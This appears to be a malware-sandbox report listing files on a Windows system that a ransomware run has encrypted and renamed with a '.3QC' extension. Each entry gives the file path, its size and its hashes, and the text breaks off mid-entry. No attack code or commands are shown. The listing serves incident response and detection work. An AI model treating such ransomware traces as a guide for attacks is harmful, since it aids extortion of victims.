06fa9f891c43b4c889f55e3699fd394ee893a1fe059dfeb72c89daa145c7f350

SHA512
0e07c55f8af1be428b6b7dea20ae6ac85f67dc7dea33011c59371aad920ec385b699388648fa4b9b5692616bc184cee00627e45903283395ad515ba18a83a28e

Download Submit
C:\Program Files (x86)\Microsoft Office\Templates\1033\Access\Charitable Contributions.accdt_[[email protected]].3QC

Filesize
1.7MB

MD5
97257c01d38766605417ec78772c9660

SHA1
12ff05d5d39d6fc6f7bce6d5659ebab690bd49a9

SHA256
2d728a7faa9e6f0cc159b9b8e79513cb3c166f7853f051b0ead71540c8e532ee

SHA512
a5df8e504137f7bca90867aa1efb9c3bad638de2d1c464ffac119ce71933b688d4135b92767568066bd33a1fab44bb296a45bd5987333ff3fe3ea0f883a2bc76

Download Submit
C:\Program Files (x86)\Microsoft Office\Templates\1033\Access\Marketing Projects.accdt_[[email protected]].3QC

Filesize
1.1MB

MD5
052ccbc6fdc7adf50d96f692b2871352

SHA1
c24ae8316aa2b0ee3118bb403d8d82df1404da59

SHA256
a84fe15ab7e51adba970c756737fb4b2ef8cc4212e5f35b4a5e5372ec871e1b8

SHA512
7e42ee535fc78de7823ce433f06caeb8ac6ce3a7590331e583a6dc7034bcd02b0870c1a944b1074f275d3688b7aea581cdc02a9ef39a87563580c5a4e8d8d286

Download Submit
C:\Program Files (x86)\Microsoft Office\Templates\1033\Access\Northwind.accdt_[[email protected]].3QC

Filesize
2.0MB

MD5
88a3fef229cdb25cbecafd357ef1a858

SHA1
8d1c2ad824e81fee5cbc7c020382c067962102bc

SHA256
10a623266765cab3a8d9ea7259bee67bbcf4994dc180069acc1fb3dcdc175979

SHA512
3e3c8e258abab56cf65e04a5402226e29a3115df5f111837c3a464d02e273566183c7858b3bd565bde596eadfa08ab8b4d5aaffaf08e812d9931b033c61e41c7

Download Submit
C:\Program Files (x86)\Microsoft Office\Templates\1033\Access\Projects.accdt_[[email protected]].3QC

Filesize
1.4MB

MD5
65fd17d1b0a2f55d55548a08673bfba6

SHA1
59adb64153b5be2f86d31460e0bf8726f80d7c64

SHA256
298c022e19c9c19dcac67142cac278e391d09b1cad1b7a66708c1da30ba06ada

SHA512
db6fac18a275472bf6096cfad44b6e7b1e2bb67c4fcf3c9d89d2683193039ebe7324e8fa963b60aacf0e188b357e4a2533e02ce48e7fa66ddd8611d0ccdbcdb8

Download Submit
C:\Program Files (x86)\Microsoft Office\Templates\1033\AdjacencyReport.dotx_[[email protected]].3QC

Filesize
3.4MB

MD5
ba97de22b316f97fe36eb78a26bdcda2

SHA1
4ed219d50373303952108964462102d07ec509f4

SHA256
6c049786b32c2220261750c8ba730e4e640129acc49761477086d6cde4ac363b

SHA512
230cdb8d9c89e006ccc8f4e3c0aa762cc87ceb04c2241e790e1ebed148a05fa26ad5aa547ab1e3cd3d6177adf8fa8f9ee0dc52c33c2ed1cacd6ff03945754c39

Download Submit
C:\Program Files (x86)\Microsoft Office\Templates\1033\BlackTieLetter.dotx_[[email protected]].3QC

Filesize
5.8MB

MD5
50cd37404c81614f14ef1f8637214d76

SHA1
870535a074c09316eb9c149e44356602abaea490

SHA256
0ed8d68467cc8254adfeb25425e87818bbc091d18837a60a4aa12c5b59210aa4

SHA512
70f54686f47df8f725395cf68450d3ce4a74707565c72c458e28a2aa978e94be251f77ef41f7d78d65dc3476b6588dc64e377e7226c45307409e0b12d01d9f39

Download Submit
C:\Program Files (x86)\Microsoft Office\Templates\1033\BlackTieMergeLetter.dotx_[[email protected]].3QC

Filesize
5.8MB

MD5
e7d32b6232bf90507512f02149c94a1b

SHA1
c6c7da7fe2938621e69114acc78775768f6fc494

SHA256
7db5a6fb15f387cfbb195fe290d8dc0f23135cc63ef77bcf52a9a6b30ee09922

SHA512
0bb9500a2caa2acde10b6003e2fb24fc51dd6c09330bfda135853953ef2403277e48621a3881c8d83e68f64dc7ae3af97901496c477879fe0f78ab7cc6cdce6e

Download Submit
C:\Program Files (x86)\Microsoft Office\Templates\1033\BlackTieNewsletter.dotx_[[email protected]].3QC

Filesize
9.4MB

MD5
23943a6f03052d6f8c2d478ceace7845

SHA1
7289b0c13a0bdb85a3dad80f84190214a5d1be6f

SHA256
a1d426bb929e8feea240f3c079042452f377fd3b3b127bf83ef9586957991242

SHA512
930d1a51569d29a4fad6d9661fd10a6c45c890abdce4bf9af61dcd4805d1c4dbcee7454f34f6927fe5bced08d2404ccf0c46ea5e819e51e9deda9fdec3ad82f4

Download Submit
C:\Program Files (x86)\Microsoft Office\Templates\1033\BlackTieResume.dotx_[[email protected]].3QC

Filesize
6.4MB

MD5
26a25f19893c3a69974c7dc705d403ab

SHA1
bbcc94466be227db5b54ed4a0d4e766665d0018c

SHA256
be20e8fe984fc91c5eacddea9094ea94298fdfae61a5f2b55be1b8d31b52cec4

SHA512
80a80d58306645cd603092517247227765c956d77ecb64bc0be3dd300b2d1b728eea2410ff7defb2bef057bc6cdc84d649c4f7ea6e13ab0a9e007fdc8eddf0e1

Download Submit
C:\Program Files (x86)\Microsoft Office\Templates\1033\ClassicPhotoAlbum.potx_[[email protected]].3QC

Filesize
1.1MB

MD5
17f25e8ce6d69447032df92fee49ca98

SHA1
86336a8edce94323e7052933f430b8140db5a71e

SHA256
bb14b9a6216808f66fe02dbfb6f2faa7f6f9d46f2de92679746126a5278cda4c

SHA512
1f875fb2307b4d10c8910da06f974d006f73173741aac5682469cfb35f092526a2321cf92f0aaa630cc485bd1d34d7fdead671d40a86fb57228ef908ee05fc65

Download Submit
C:\Program Files (x86)\Microsoft Office\Templates\1033\EquityReport.Dotx_[[email protected]].3QC

Filesize
1.7MB

MD5
ccf6a2e53fabf1bc30f4d0c2608bcfe6

SHA1
792ee707aaa4788bf0dda3a9db4b5c2c30ee06fb

SHA256
271bb2b8fd379f4d6cfe78a9a2610ac536e12b1f1da641ab205a5a7ed7c09c5c

SHA512
c5c16ef2101c82038c7633de2431820c6b5a97c55152f0d3b1a66fd75c5003953327715936cadbe4ea9ffb3ca02f5b5ed445ffce896b1b4d00e7591136679d7f

Download Submit
C:\Program Files (x86)\Microsoft Office\Templates\1033\FiveRules.potx_[[email protected]].3QC

Filesize
31.6MB

MD5
e5a83cd8481ecb7d176db91f224a54c7

SHA1
cf0c20cfb2a1b57fdb5d1c7afc9b2b36a2484fcc

SHA256
51d8bfb3d686a42ba3a273d09aba57fb7ecaabec4f8a975c8fafc2df38fd292a

SHA512
9ac23e2c3bec4d5035887662fdfac44285a4d2bc5da1fb345cb94a917d37386c0b4d2e79429a8b7a5ca7ad34c49264e64b6b2b739c424a6fba283c281c6ddda3

Download Submit
C:\Program Files (x86)\Microsoft Office\Templates\1033\IntroducingPowerPoint2010.potx_[[email protected]].3QC

Filesize
16.7MB

MD5
bd858e9eed3f26b64d506c6c12422aae

SHA1
49dd31dd1378dd3ffee63f43c35762c0db5f3fd7

SHA256
8710788582568c767dd98e4b0e79926c86adc899a58edcf80f2bbd8589329b42

SHA512
a19892c2e918a3ce597657d446754f5e2db973306b1ed5baab2e9e8b05851574338e0670af696c33914996e26d82847d6dfd8a8a445425ca51041d3fc6da1f05

Download Submit
C:\Program Files (x86)\Microsoft Office\Templates\1033\ONENOTE\14\Notebook Templates\Notebook03.onepkg_[[email protected]].3QC

Filesize
1.3MB

MD5
5f53923449a2aa27d6f8e2327da7ffb2

SHA1
23f3faa35043c27041a00bd428d22bc8c9339b86

SHA256
f1eb04335710518a5ed65048b6efa55fb7d22715036d3b4a480f7afa0fc060c7

SHA512
c26e50112369eb364a0cfa33a6c6a946a190cb9877eaf3cb934bdc54e660e0cc7b54782a3b29f681a589b69b0f0af1072d007e02e9ec8b21310f0586f91d5e7e

Download Submit
C:\Program Files (x86)\Microsoft Office\Templates\1033\ONENOTE\14\Stationery\DESIGNER.ONE_[[email protected]].3QC

Filesize
3.1MB

MD5
2d4608884ade5945e811517b39ec5b20

SHA1
8398a6a38e2762af5e81bccad229454499e1b19a

SHA256
c6b36fad3f4b335516f888db28eb0dd3ec6de299db3c321d817b24725bae992f

SHA512
089ba9d43e9f069d7ef832d36e2328c7ed89d515cdf2e6b156671fe3a3fa707946db4a0306c1eddc89aa6b88a491045ce8b2bbb1d55e3baf2d19f516892f5425

Download Submit
C:\Program Files (x86)\Microsoft Office\Templates\1033\Training.potx_[[email protected]].3QC

Filesize
1.2MB

MD5
63d02791f83c3a79415e57397a2b93c7

SHA1
0bd5f88c12d9194312cb6d30ba464a853b7cb85a

SHA256
01d8aab81ca2a95d098901b42025a7b389a04395e49960351ff0e62d7960ed3f

SHA512
66098f982259ff7dd7339e34b0962a378dbd2b3096c0e9f1748f584d344474bd7b1a777d6a1b042c722675633e911963b2cb7fb3e476f23c36b7fda32625fbcb

Download Submit
C:\Program Files (x86)\Microsoft Office\Templates\1033\UrbanPhotoAlbum.potx_[[email protected]].3QC

Filesize
4.1MB

MD5
f5e1eb1d33cf15ca907c2f2514e3e700

SHA1
8361ad0f91d30a3fbd169234f3ce8278bc917a32

SHA256
969b31d748e0db79d9e3155868a08da4d8e5317e8e8eb8bb7bcb6d25e8dfd57a

SHA512
9963632eca4bcdddeea68d3837031a1cf166bb7a4b06df53a776c6857e20bd8b44df9bd529d0274840dca5b9a61b5bfa94bd9f1cd1674586f509a135cecd8a52

Download Submit
C:\Program Files\7-Zip\7-zip.chm

Filesize
112KB

MD5
69ef84052c52c80b1005becdfb9f693e

SHA1
23f69d47801a68373d114fc7fae3572fb6501b50

SHA256
2a59dff8dae04741f06f6b8771a7d983c2912e62bd42f539256955a5191d8c22

SHA512
bc3836c5e4f1348b516040ffa2dfbdc52d0673ed2c4230f9da9c4648025210c7b34d82570f1759384d784d6b358e2c10bfeb3f0df009966c7627d1db5ed75fa4

Download Submit
C:\Program Files\7-Zip\7-zip.chm

Filesize
112KB

MD5
d265e830fe3cad5ebe837f75a17f08e6

SHA1
7b3cc1f0bf25527459842cc8cc4e8693d5e070b3

SHA256
1d4977b2c9d4d10a2f872fecbbd9fe48e8a807a481dec30534b2b508bdd9be57

SHA512
249d6e53741d1e3a28d36709a53e660422d188d29c63c91b06c4625e27c3b73dca0cc8aa68ec58f72efd2d4e8e0ab77bb34663d60d0e96d0046dc0d7fa22ea79

Download Submit
C:\Program Files\7-Zip\Lang\af.txt

Filesize
5KB

MD5
b42407def37024330b3221a2c4069921

SHA1
750186ee38c474d719c04fe7edd24a7df2607002

SHA256
6c1c3aff85791476bdb80b13dd6bdd6304db8e76078a9939d5ef6152d44ebd97

SHA512
c1309b4027613724152424e4192fd34a44e23961493cef374ea8984cd4ae859f74f87cb3864133ec6ff7a8f8c4662ab5ff9b260cf5bc599a92cd3f78e8a1a193

Download Submit
C:\Program Files\7-Zip\Lang\af.txt

Filesize
4KB

MD5
ba53939f45778375f472099eca4505a0

SHA1
0c5e12ab0907c74b78f9b30db0b1a348b811a45d

SHA256
0c0220e9aa60dec22e12175222a4d517051c026b58c323a02261ed01f205d809

SHA512
b53f2e8f9635d26f80369ba8eecda0f49e4d4c5c9ae45eeaa20243b4c56d9b54cf2d06bdabe3f9c7e16762def60da1c567315d562f4d7c11300288e0c8c5a7b7

Download Submit
C:\Program Files\7-Zip\Lang\an.txt

Filesize
7KB

MD5
56829100e5de9ca58449580f8e6103b4

SHA1
494653a7751e9c305f6b4de5a1108db4d6356891

SHA256
d45125abae48693cefac0a6904b472ce8bbfc2b14e1d8b4f5ab42de6fe98d438

SHA512
90c9ca0efce4f02bc9a3604e7b353cd6675543bec443e10416dcf60cfa7381abc5fa556d94cb35250dad46ce275252537ed8681dc6d2014294e0e74fad2e4ad0

Download Submit
C:\Program Files\7-Zip\Lang\an.txt

Filesize
7KB

MD5
abe454dcf35451f2f3bca733fcf0ace7

SHA1
59d285775487bc4df09d06cd248e7deeb5c0bba9

SHA256
c48a707cf746df528e58173c1e4897efd48a3edffdbfb51d45ff065eb632244a

SHA512
f0bbdcaf91ce0855bc547c64e2b9bf1d8d782802d66cb0422cd6b63de8bc1c596cfaef48caf6d04ab3dc09e9b5a0ea597af2db6800a51fe919baf0453120a27e

Download Submit
C:\Program Files\7-Zip\Lang\ar.txt

Filesize
12KB

MD5
c2791d8c3e45fc71d3b798d7c3dfa143

SHA1
97e01e1d4efba6d59777606aac03830a4307b583

SHA256
214460123915879c5a1bd1b36869a5f7ca8e54bfdb0240f5e7fb067b2b9e5d36

SHA512
9cd65bd4452338927d1149750cf2be46237d4f0937ca68e435ddf8fc3609fc0fa0619712f5cd6da8a5977c000f3ccb8b96be9b5a9a712a5c600371cdeadd1399

Download Submit
C:\Program Files\7-Zip\Lang\ar.txt

Filesize
12KB

MD5
cbd314a4eb88240f84a0354ab06b30ea

SHA1
3f43830fbdd8699fc9f41fcdbcd38efc0c338b07

SHA256
01285ba90344d69afbcff983a583df0122e215121134c8d54aa79a838ea3fa43

SHA512
68bd2d2cbe7b7934f6df08a792119bddef1434c66bdd13ddb07f2a32ac828d7732b7a0dfc9b037414a1375edbd072ee33033bfa216a63b3b3d936e74e9fec2ac

Download Submit
C:\Program Files\7-Zip\Lang\eo.txt

Filesize
5KB

MD5
cbeed175a91aa56db0aff22acb4f419f

SHA1
1c39ac0563d90808f9051483e2dd570cd08d0194

SHA256
29116ca0c853ef88e8d9e960e8994c854dfa970a93776fc3f0c6239a91b75364

SHA512
20567ecce3b449f8aba085a930961b22dd07c658c46a228284bc4fe1831758d26a8dcbee74fdce3a6ad22785e32fafc31282d8a5234652686777a20e3f81b197

Download Submit
C:\Program Files\7-Zip\Lang\eo.txt

Filesize
5KB

MD5
62e66f7dc0054d1763df38cd4830b06f

SHA1
e437502bfb5e97a83a5cfa8c6fd0542f7f6070ac

SHA256
6520c6fa0e812286a0c6ac870f44ea99432a924cdf28515ad8886bffe24e67c7

SHA512
e3585c4b6c811583ee3d837eeb6282bf156c5f9b7f07fd522919c65094066cffd7fa8b981981845f1f24aa50bf280c8ea9d18ac68e2062407b0cb44778543794

Download Submit
C:\Program Files\7-Zip\Lang\zh-tw.txt

Filesize
8KB

MD5
fc7d1ea12d2c64166dd84e2f3ce119a2

SHA1
6bd7105020750d02ff4c65796401d390acaadc48

SHA256
140b5c703baf5665c123f160d37bcad54a9af7a88684ff4263b7f62b040c681e

SHA512
c0bb365c14c60b3fece319ecffc595622ae9e8c5441f47b410583fb382aaf835c2d8e6e3bd73029c12ba7eb59ddfcc839bd89fa6b5a96ab72d6e4888888be7b0

Download Submit
C:\Program Files\7-Zip\readme.txt_[[email protected]].3QC

Filesize
1KB

MD5
4b74d002065b86cb71aa22399791ddf2

SHA1
995db2efcc88f75efc9303a48eabd110b1fbec24

SHA256
09bd67ebebe92f2274a52e71fac66f7c5f1e16f07a3deef61e35287c43100e7e

SHA512
5bcdc36cbc36b29b7c5512e2d68fe450d3926fed41af191a99a13d8f7d67867dae5de6506949e6dcee6b8ccbecc9b57f25dbd10e67982510b2e81a1c22679147

Download Submit
C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPWMI.DLL_[[email protected]].3QC

Filesize
143KB

MD5
0574545e61a577bf2a10d41f905df375

SHA1
0da26d3d2898d44b97842702652919c42941dae7

SHA256
970d2701a4c620e57d87e4c4e92c25b3e69c206907411c25c5eb8bbead201119

SHA512
98591ec268a1de245bf12134397ec97d498986d8fda110280b16403bffb5b7d476535d55a3a208fe4dbf91a885bc6a0f62fe50445b56f0613fe6dfc30509d945

Download Submit
C:\Program Files\CompressUndo.ttc

Filesize
391KB

MD5
476ca3104bd0ef5d5b0c1d9fa7e43c40

SHA1
835357e8496451c1213caf664fde871ab6dc18e1

SHA256
1e87804a0ee4267ce4214a25e183186d824fd660dcfc6f819a4db808ab536da5

SHA512
ace1ddb1f5118440a41ea3a22c84e845e1154f9d25c018f95b4f72c240953070d470be2ffd608d699d57879f2362c24f98a10092f08073ef6f16c0735cf40bae

Download Submit
C:\Program Files\ConvertSubmit.hta_[[email protected]].3QC

Filesize
272KB

MD5
3b1448227fefdc91e24edca5097e6ece

SHA1
3fda34eac040091d5b9db535c90208951037eefa

SHA256
c5f370d11d22ffa6c9da36bb736361ab6697be873b701d028520bcd27e53216a

SHA512
6c0c86b047b8f7d10b3e634ea8bf35707aa4d31fcea72248c6d91872686f9a86138e50baf1dbeb85e1bb5e9170b24a2ca0f6aced549750107c5c5fe589467eb3

Download Submit
C:\Program Files\DismountRevoke.dib_[[email protected]].3QC

Filesize
1.0MB

MD5
14c7c623ba5dc28498f374021cfeeeb5

SHA1
1e71ca63a71df0892110d675c39145aa787ab789

SHA256
7a35e1d09f01c2a8cfb7a0bb4b0de206622527f0c7192e10c739e20058cfbd5b

SHA512
d01008ba7699f09612a91bf3e0b3add312372581786d34f4d4ae2c30592f0b452c054672969ae3ed29c7791a73f841f88383a383bf72f0e45bfc49618fc75341

Download Submit
C:\Program Files\Google\Chrome\Application\106.0.5249.119\chrome.dll.sig

Filesize
1KB

MD5
e5d0791351093eb2b4a5a6623316e57e

SHA1
bbc10e808ace907a5380dad0bdaeffc7a80a3f27

SHA256
bee50d8805b44f5164ade19d71e41744d0ede24e0412766b01529b28572c6777

SHA512
e1f68db6705125c0addadc70a1afabcc3f9b96d83c60cbf178e4bea8fecd580178e4039931eab447cc421ec619e095a86eabc1ab96b8c083038a1297aafd074c

Download Submit
C:\Program Files\Google\Chrome\Application\106.0.5249.119\resources.pak_[[email protected]].3QC

Filesize
7.4MB

MD5
2380bea8b74ad1c3eefd4cb137c9df47

SHA1
3f628073cf03010ca4ddc37a97a36aa02d8ad3c9

SHA256
dac8d865645124c733c49df69f263b7b0e1fc085e406f4b5b7b77e22d0c84922

SHA512
b92dbb2732df9e52a958bfbb5f1dbee914ec9c46481e0d22eee40df26ab51ff86c4ab0f71cd09cf09fbe31a3400b97afea1e689fca194648c335b50e89070faa

Download Submit
C:\Program Files\Java\jdk1.7.0_80\db\lib\derby.jar_[[email protected]].3QC

Filesize
2.6MB

MD5
4d66ae76dac4437ba96cb0ccab3c551d

SHA1
a29a92654de99c494d868dc3d0ae81f525cfce1b

SHA256
7d2247fc4f1078438abe91c40e643401f89f5de6c6535b5c0afe15a8490def08

SHA512
a5182aa36aff870917d6336ecd329a51f0b78bf9cf0b699d320aa47ae9b61f404dc677638d607bd1f93b3fa2ccaa796785e911d5b6d5ef910dd66b8ee54250b6

Download Submit
C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\Xusage.txt

Filesize
1KB

MD5
6c4076abe45485e071c54b2a6af0fced

SHA1
097fa1249ee7c18d0f1949edc7f1f6b0eebee9ff

SHA256
e926d826971914db69d43a63b7f30aea28ee759468f0127abd285ff4364962e4

SHA512
aa8551b1838d46b6ddce6e129e2daa3c628a88c60eb1adee73cf0457b094f1478ebc9afc4e4cabc59cad726ffd89ffca9c88ae52fabd5299efcb4ed91093de6d

Download Submit
C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\Xusage.txt_[[email protected]].3QC

Filesize
1KB

MD5
51ff1a34755ea87334363398048c0f10

SHA1
00d81e52d287ef310c4caea919dc5bc966a0f466

SHA256
17bfb8b8d892e8a2658625a52c29383c1f966e2726dae5c51974e76041fffde2

SHA512
e37bc88625a99c832b2713306c8b0e7db107851cd8422c3556cda3d747fb4752cf8c14e0e82d2efbdbba75a20eda5e01a928223a088d7be79cc15d483bc5fb27

Download Submit
C:\Program Files\Java\jdk1.7.0_80\jre\lib\charsets.jar_[[email protected]].3QC

Filesize
3.5MB

MD5
968e521cb23f7bbff38db0c970099c85

SHA1
add244bd1ab221201afec89ab01c42860b741aeb

SHA256
9d536b4ceefa7e8a0be437b1d772b0cdf90df497630ecf0cb49ac0fd5902315a

SHA512
143e7ba66f042766fe359dec833d73fe9013809e3dc4dc5e1b5b48e3c0f6bf18e02cc92634514bdc69a128930b2e08728532fdcef0a70c8be73b47206937554e

Download Submit
C:\Program Files\Java\jdk1.7.0_80\jre\lib\cmm\PYCC.pf_[[email protected]].3QC

Filesize
268KB

MD5
dbc7384dde2a0e532d849f2e8585e560

SHA1
fdbbb4b252a4d757036d69c7f59311bafc6abac3

SHA256
5f3328b511f023df70b496ff4ac6b26b5c99c7e2e35784c48d053105baf1e048

SHA512
a44ac8e4d5fe611754fadad9b31b8890114bff8c6c9931f8491b3cd9cf8dfbcf3970025f82984ef806ef9276fa6f827043a937680d787a1ff22fdc4b8cc84126

Download Submit
C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy.jar_[[email protected]].3QC

Filesize
4.5MB

MD5
06f5c75d5e579dde248afdfb4b084607

SHA1
27edad48187c8597b72a46d870f32e2da0f44138

SHA256
e0f8f8f00ecdc8efbed0ff9a4e48670743c22fa80137f761d091809a43b75605

SHA512
49b21b50091c436603951a4c2dea3db826888adf64a5456eb6629fde431d9ba932eea0af6a4ba9f7ee500cb9126a35887be821d5855ab989e16a7b4fc6119500

Download Submit
C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\localedata.jar_[[email protected]].3QC

Filesize
1001KB

MD5
551e4290890b13cc3bc35be18c57c0c4

SHA1
a1ecd52f6aed6f4612b2c055b3baf5e2d075e62a

SHA256
555d9d6991a9805f8f7f34a0e1dbd873c3a037158705fc0533f2ef3ea6f6d86a

SHA512
afcb72ba1daa75eba4a529c08a8c82d4c19c6447c96df3963849937a3590c3ac1dd2620155d5cf64a75a5db08667764f850e32a73b0f9b70f2fef70f07cf6e8a

Download Submit
C:\Program Files\Java\jdk1.7.0_80\jre\lib\jfr.jar_[[email protected]].3QC

Filesize
520KB

MD5
454104435f87a2fb804701845012bd97

SHA1
d69969c3db970119b90aff2f61fb8c6f17f3d59b

SHA256
38eda75fce8bbd82587606068571a2c2b199072038f66d748d5865f2375c827c

SHA512
b2b0418c292900b249e6e5abf2d2f5e440118a68abdd865d740370a89a5d589fe54478846f7876522ca02477a6182a6f4be0e08b6004d32888500eecdc3bc8c6

Download Submit
C:\Program Files\Java\jdk1.7.0_80\jre\lib\jfxrt.jar_[[email protected]].3QC

Filesize
14.4MB

MD5
2cbe0d065311b67990644c3f3ab0def3

SHA1
5f05a4c374d5b0d1d7970b2596ee77f61f838220

SHA256
5993e14e04a30fddd337a01b736564c33e19d727a32a62aadd793919df0ae989

SHA512
d5df343d2e8fe0fa0d91e407513895b95aa9f67a4ca8047ca01a6aeb9993892633bbceb21cdf74b6b9e9d569bff158960761f3ec59dbc5a9bbab158ab9776504

Download Submit
C:\Program Files\Java\jdk1.7.0_80\jre\lib\jsse.jar

Filesize
571KB

MD5
ace93ca0fd2e0596fde5f6f751706ddb

SHA1
98c22359a6fdfb87658bc90029331df4a528b329

SHA256
d45bf6c3f5e7c98b517d21a46c22e41b151afed41c5e2c00774f807a3fd79066

SHA512
289df97c32f37514241bf3afa29f30cd7abb48c76832c8b499c1ef238d0c88cb07feba42f38da5382351e6b0cb93c3cb4a4e6e70b8fec1eb709842869eca71e1

Download Submit
C:\Program Files\Java\jdk1.7.0_80\jre\lib\jsse.jar_[[email protected]].3QC

Filesize
572KB

MD5
fd31f2ec910c64bc8f8f9f4ab45b1eac

SHA1
ad4bf484bf6cd22c4b321329da8c67819e25eee2

SHA256
20f5f8a1f0689ed59775bac48d977f6aec5d1978883f03e7cb073ed173180af2

SHA512
0ce6157baf14cf15f9d9c9a54bb26e62e5edb88380e39fb29b0a13879ac386bb63c4fbf21b64d8451ed12e432115dceb61ea120054d4362c12c240ff91ad41f6

Download Submit
C:\Program Files\Java\jdk1.7.0_80\jre\lib\plugin.jar

Filesize
1.8MB

MD5
dad1f2c80da3b365cba3b91ed46bef89

SHA1
78066a94064cf4418de4866eb2192386bbb0175c

SHA256
ad31ed8297c2c0f27db8fb4977f802fa0e28c85caa4dc7b48e165dc46305ffb7

SHA512
6d1e976ab4f704ad87d0b5be023165b385305619d27b052ba685eb0ed657fd09511decbcd2b5d959f0149fec7632cb668b5204d5fc8d3fc67925ccb523419c02

Download Submit
C:\Program Files\Java\jdk1.7.0_80\jre\lib\resources.jar_[[email protected]].3QC

Filesize
2.3MB

MD5
5da88efc5d252468383e840e91f2b4e7

SHA1
eacbdd6937a9c9c289bdc3784431aee0f445b3de

SHA256
6ee213db95291a15253f7cf684a271b14d180b7f82c85ed4c73ee15e15ce3102

SHA512
920c74e1f4f8342789669ef38107457031e835812abca479fd4e7671f285382f901cb58ae4c9f683df101930dede70804743ba68832bc8cc775dda41ac81958f

Download Submit
C:\Program Files\Java\jdk1.7.0_80\lib\javafx-doclet.jar_[[email protected]].3QC

Filesize
1.1MB

MD5
977b171167dac207c0d4f3fba3093ebd

SHA1
db36446ec3e2c44a24988d02effa8f45d53a143f

SHA256
6c6927a3ca42cebcb9f33d503411c7a920f2dc4027a66a47735a876236c6f58f

SHA512
e13f72092cdf19f557b1523040d19087f8e09b69dfee6cf7ab12485ed909906f547426e055ba2fc6d7665b6e4b00a867d754d1df6899d076a7d46866f6015060

Download Submit
C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.ibm.icu_52.1.0.v201404241930.jar

Filesize
10.2MB

MD5
d17baea58847d1ad3e5429f879b681eb

SHA1
a36bf78c3e4e254ce77122ecaf2d4b0b69847fec

SHA256
6ba0aa697566fc4bd6710644602aec5eb3f55de08c0d201aedadbeaaa56eec1b

SHA512
26d0477a188af6ba1a459d51ba46655834354ae9df5a0c01d2e1a0e97b908cb746731f351dd6ceac15a10f06703dd161d539848c41deec91aff8870d04e65144

Download Submit
C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.ibm.icu_52.1.0.v201404241930.jar_[[email protected]].3QC

Filesize
10.2MB

MD5
9cabbd628ef5476dd18c11151322b8cd

SHA1
7ac9f312421fbb03c4fc5ec6651fb166a5f627ee

SHA256
caf9f13b04e2dfe333405c895bffc70ec64a8affea4f3dd92f77b1e899aa6711

SHA512
53e0c9b9971ba0ec8ca266088db8951b661c6b41d0f94ebaed674796bc3ef987c74b647cdeb21ae3e51604a990c5dcaa69ea7e8e810016e724a6bd6051aa3109

Download Submit
C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.ui_5.5.0.165303.jar_[[email protected]].3QC

Filesize
1.1MB

MD5
30b68d68847df4a8f69e0c9a143c87e7

SHA1
9c633829ed135756fbdc97b10f65a7a31e1a07a3

SHA256
74c990229c569dca449628eeea6d911188549cc138368b0058948c9ba3ca596b

SHA512
baab6d122c508d5c2abc2218dcb23fc1460396397eb5f35c9cb0b3f236196bd29f5ef213f25077e533cc1af5f0669c43b5dc472d8f15a7e65d08bccbd2bb7ea0

Download Submit
C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rcp.application_5.5.0.165303.jar_[[email protected]].3QC

Filesize
1.8MB

MD5
48781edaf3a31c4e6a140b4f77e769e5

SHA1
3eddacbc7fe7480e6c6c240a18ad5eac3f50a0ad

SHA256
10f74c5b14b8040dea17349b3e424c34b876c8b112891534373889de5767dbb4

SHA512
1c29ff86a535e4dec5515d629cb2654f0d24b732ac3d05ee44951ed6735be019c714e6812b20b1f0c48507d2ae5209b596ef0a46feab76a47fa843c0c40d0982

Download Submit
C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.jasper.glassfish_2.2.2.v201205150955.jar_[[email protected]].3QC

Filesize
2.3MB

MD5
70ef87599ae1e25895a6d0af963b04dc

SHA1
a6e1748ec1e06f842f2bdab8188e09076089ce81

SHA256
1adedef0c1f9054e6b5dac42d83d895375f594d85f385cd2ccec467623a9692c

SHA512
502bf85fb777fecf87ef065731186d53d32864bc55a38986a4f16872e312d8f4cb2259563f0bc9c7865ba6bd500eb73169919a04836ee5356da54da3b5d0baa5

Download Submit
C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.lucene.core_3.5.0.v20120725-1805.jar_[[email protected]].3QC

Filesize
1.5MB

MD5
cf96b6ce2caa39c43c7128cb6bdb25e9

SHA1
836c7b04f8bb3138c8c8dffc8ce9804e40b704d3

SHA256
3a28a81b2b3c69435c12e20a7dba681b429838b76562c3c2377fcf5cfbd54f80

SHA512
261ed12ad735806198b8d477125e981a2993320df6a41b8d5c897d96332b731d1f30f3c3e1a48625abcac91c0fa2c5916dc3464b3097156ed2d3141c0854a0ec

Download Submit
C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jface_3.10.1.v20140813-1009.jar_[[email protected]].3QC

Filesize
1.1MB

MD5
9292f0f8e81230bf5bb22d18e63e7f6c

SHA1
0e1d7aa6396ef70a21075bd6dbb950e55aab843b

SHA256
8471ca1e18a59ea07408723941d6d5d5ba2265077657b5b5f4ecae03fc3e8833

SHA512
3327a491680ebeb8a6f8e91f3a9301e7e6c470f548723fcbd058237672baf9812a1619f980f0afed0f246651b80ba6921f061af2292691e0195869a4ae8bc334

Download Submit
C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.osgi_3.10.1.v20140909-1633.jar_[[email protected]].3QC

Filesize
1.2MB

MD5
334c52676258906ca1068ba0eb9af958

SHA1
2a7ec185e7f483610068014c114e660bafb9590b

SHA256
3d75d7ecf2fcf140c23e1b7f45ce4a2e36da7695c9ab2541a193514e6ebdfe21

SHA512
2c902acd493dfd48c379369eb43b0749a412fb86e1b1186845a162a38ea9a358864b2d00d0c8e058bf689b941f92faf38f4a2c85f690398373f62f7c0b417c93

Download Submit
C:\Program Files\Java\jdk1.7.0_80\lib\sa-jdi.jar_[[email protected]].3QC

Filesize
2.5MB

MD5
1a5fa7d0ea08c52cb998a147507f57de

SHA1
21d76d97a3c0fb439b97d6f58b7310ac83aca3eb

SHA256
